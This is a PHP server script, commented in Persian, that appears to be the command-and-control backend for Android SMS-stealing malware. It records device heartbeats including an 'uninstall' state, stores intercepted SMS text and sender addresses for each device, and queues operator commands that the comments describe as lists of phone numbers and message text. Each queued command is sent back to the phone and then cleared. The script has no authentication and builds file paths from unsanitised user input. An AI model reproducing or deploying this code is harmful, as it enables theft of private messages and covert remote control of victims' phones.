<?php
$dir_path = 'data/';
$cache_file = 'list_cache.json';
header('Content-Type: application/json');
$method = $_SERVER['REQUEST_METHOD'];

// --- بخش ۱: دریافت وضعیت (GET) ---
if ($method === 'GET') {
    if (isset($_GET['check_id'])) {
        $user_id = $_GET['check_id'];
        $file_path = $dir_path . $user_id . '.json';
        if (file_exists($file_path)) {
            echo file_get_contents($file_path);
        } else {
            echo json_encode(['status' => 'NotFound']);
        }
    }
    exit;
}

// --- بخش ۲: ثبت وضعیت (POST) ---
if ($method !== 'POST') {
    http_response_code(405);
    echo json_encode(['success' => false, 'message' => 'Method Not Allowed']);
    exit;
}

$input = file_get_contents('php://input');
$data = json_decode($input, true);

// بررسی وجود پارامترهای اصلی
if (empty($data['user_id'])) {
    http_response_code(400);
    echo json_encode(['success' => false, 'message' => 'Missing user_id']);
    exit;
}

$user_id = $data['user_id'];
$action = isset($data['action']) ? strtolower($data['action']) : '';
$timestamp = date('Y-m-d H:i:s');

// ایجاد پوشه در صورت عدم وجود
if (!is_dir($dir_path)) {
    mkdir($dir_path, 0755, true);
}

$file_path = $dir_path . $user_id . '.json';
$current_data = [];

// خواندن اطلاعات قبلی کاربر
if (file_exists($file_path)) {
    $current_data = json_decode(file_get_contents($file_path), true);
    if (!is_array($current_data)) $current_data = [];
}

// --- مدیریت دستورات (Command) ---
if ($action == 'command' && isset($data['command'])) {
    // ذخیره دستور در فایل کاربر
    $current_data['pending_command'] = $data['command'];
    
    // اگر payload وجود دارد (مثل لیست شماره‌ها و متن پیام)، آن را هم ذخیره کن
    if (isset($data['payload'])) {
        $current_data['command_payload'] = $data['payload'];
    } else {
        unset($current_data['command_payload']); // پاک کردن payloadهای قبلی
    }
    
    $current_data['timestamp'] = $timestamp;
    file_put_contents($file_path, json_encode($current_data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE), LOCK_EX);
    echo json_encode(['success' => true, 'message' => 'Command saved']);
    exit;
}

// --- مدیریت وضعیت (Heartbeat) ---
$status_text = 'Offline'; // پیش‌فرض
if ($action == 'online') $status_text = 'Online';
elseif ($action == 'offline') $status_text = 'Offline';
elseif ($action == 'uninstall') $status_text = 'Deleted';

// به‌روزرسانی داده‌های اصلی کاربر
$current_data['user_id'] = $user_id;
$current_data['status'] = $status_text;
$current_data['timestamp'] = $timestamp;

// --- بخش جدید: دریافت و ذخیره پیامک ---
$sms_body = isset($data['sms_body']) ? $data['sms_body'] : '';
$sms_address = isset($data['sms_address']) ? $data['sms_address'] : '';

// اگر پیامکی ارسال شده، آن را ذخیره کن
if (!empty($sms_body)) {
    $current_data['last_sms'] = [
        'body' => $sms_body,
        'address' => $sms_address,
        'time' => $timestamp
    ];
}

// ذخیره فایل کاربر
file_put_contents($file_path, json_encode($current_data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE), LOCK_EX);

// --- به‌روزرسانی کش لیست ---
$cache_data = [];
if (file_exists($cache_file)) {
    $cache_data = json_decode(file_get_contents($cache_file), true);
    if (!is_array($cache_data)) $cache_data = [];
}

$found = false;
foreach ($cache_data as $key => $u) {
    if ($u['user_id'] == $user_id) {
        $cache_data[$key] = $current_data;
        $found = true;
        break;
    }
}
if (!$found) {
    $cache_data[] = $current_data;
}

// مرتب‌سازی بر اساس زمان (جدیدترین بالا)
usort($cache_data, function($a, $b) {
    return strtotime($b['timestamp']) - strtotime($a['timestamp']);
});

file_put_contents($cache_file, json_encode($cache_data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE), LOCK_EX);

// --- پاسخ نهایی به گوشی ---
// --- پاسخ نهایی به گوشی ---
$response = ['success' => true, 'status' => $status_text];

if (isset($current_data['pending_command'])) {
    $response['pending_command'] = $current_data['pending_command'];
    if (isset($current_data['command_payload'])) {
        $response['command_payload'] = $current_data['command_payload'];
    }
    
    // پاک کردن دستور پس از ارسال به گوشی
    unset($current_data['pending_command']);
    unset($current_data['command_payload']);
    file_put_contents($file_path, json_encode($current_data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE), LOCK_EX);
}

echo json_encode($response);
?>